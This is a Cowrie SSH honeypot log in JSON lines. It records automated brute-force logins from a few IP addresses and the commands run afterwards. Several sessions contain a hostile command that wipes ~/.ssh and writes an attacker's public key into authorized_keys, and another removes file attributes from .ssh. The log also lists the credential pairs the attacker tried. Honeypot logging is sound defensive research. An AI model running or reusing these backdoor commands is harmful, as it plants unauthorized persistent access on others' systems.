{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:59:50.696843Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:59:50.967850Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:50.968843Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39088,"dst_ip":"1.2.3.4","dst_port":22,"session":"8935c8a5f27e","protocol":"ssh","message":"New connection: 212.227.235.229:39088 (1.2.3.4:22) [session: 8935c8a5f27e]","sensor":"my-vps","timestamp":"2025-08-31T05:59:51.237151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:51.238005Z","src_ip":"212.227.235.229","session":"8935c8a5f27e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:51.508817Z","src_ip":"212.227.235.229","session":"8935c8a5f27e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:59:52.633768Z","src_ip":"212.227.235.229","session":"8935c8a5f27e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:53.908529Z","src_ip":"212.227.235.229","session":"8935c8a5f27e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39092,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f50241cbe28","protocol":"ssh","message":"New connection: 212.227.235.229:39092 (1.2.3.4:22) [session: 0f50241cbe28]","sensor":"my-vps","timestamp":"2025-08-31T05:59:54.176925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:54.177833Z","src_ip":"212.227.235.229","session":"0f50241cbe28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:54.447555Z","src_ip":"212.227.235.229","session":"0f50241cbe28"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:55.569158Z","src_ip":"212.227.235.229","session":"0f50241cbe28"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:55.840205Z","src_ip":"212.227.235.229","session":"0f50241cbe28"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:55.842034Z","src_ip":"212.227.235.229","session":"fe53d4f18d37"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:00:05.186654Z","src_ip":"212.227.125.160","session":"2bc1291cafa6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:00:05.346290Z","src_ip":"212.227.125.160","session":"2bc1291cafa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45820,"dst_ip":"1.2.3.4","dst_port":22,"session":"12a159c9012c","protocol":"ssh","message":"New connection: 212.227.235.229:45820 (1.2.3.4:22) [session: 12a159c9012c]","sensor":"my-vps","timestamp":"2025-08-31T06:00:08.472272Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:00:08.473036Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:00:08.754125Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.login.success","username":"root","password":"Ta123456","message":"login attempt [root/Ta123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:00:09.919001Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:00:10.497015Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:00:10.497838Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:00:10.499027Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:10.781592Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:00:11.401733Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:00:11.402679Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:00:11.685852Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:11.686922Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46918,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c5759cc1e6d","protocol":"ssh","message":"New connection: 212.227.235.229:46918 (1.2.3.4:22) [session: 1c5759cc1e6d]","sensor":"my-vps","timestamp":"2025-08-31T06:00:12.027360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:00:12.028438Z","src_ip":"212.227.235.229","session":"1c5759cc1e6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:00:12.349999Z","src_ip":"212.227.235.229","session":"1c5759cc1e6d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:13.676334Z","src_ip":"212.227.235.229","session":"1c5759cc1e6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58552,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d4b04c87c37","protocol":"ssh","message":"New connection: 212.227.235.229:58552 (1.2.3.4:22) [session: 8d4b04c87c37]","sensor":"my-vps","timestamp":"2025-08-31T06:00:13.884018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:00:14.590022Z","src_ip":"212.227.235.229","session":"8d4b04c87c37"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:00:14.590764Z","src_ip":"212.227.235.229","session":"8d4b04c87c37"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:15.001869Z","src_ip":"212.227.235.229","session":"1c5759cc1e6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48040,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2be3a76772b","protocol":"ssh","message":"New connection: 212.227.235.229:48040 (1.2.3.4:22) [session: f2be3a76772b]","sensor":"my-vps","timestamp":"2025-08-31T06:00:15.303687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:00:15.304570Z","src_ip":"212.227.235.229","session":"f2be3a76772b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:00:15.607488Z","src_ip":"212.227.235.229","session":"f2be3a76772b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:00:16.861059Z","src_ip":"212.227.235.229","session":"f2be3a76772b"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:17.144337Z","src_ip":"212.227.235.229","session":"12a159c9012c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:17.165122Z","src_ip":"212.227.235.229","session":"f2be3a76772b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38994,"dst_ip":"1.2.3.4","dst_port":22,"session":"59099781f5b5","protocol":"ssh","message":"New connection: 212.227.235.229:38994 (1.2.3.4:22) [session: 59099781f5b5]","sensor":"my-vps","timestamp":"2025-08-31T06:00:17.674793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:00:17.675683Z","src_ip":"212.227.235.229","session":"59099781f5b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:00:17.963889Z","src_ip":"212.227.235.229","session":"59099781f5b5"}
{"eventid":"cowrie.login.failed","username":"npm","password":"npm","message":"login attempt [npm/npm] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:19.160654Z","src_ip":"212.227.235.229","session":"59099781f5b5"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:20.451760Z","src_ip":"212.227.235.229","session":"59099781f5b5"}
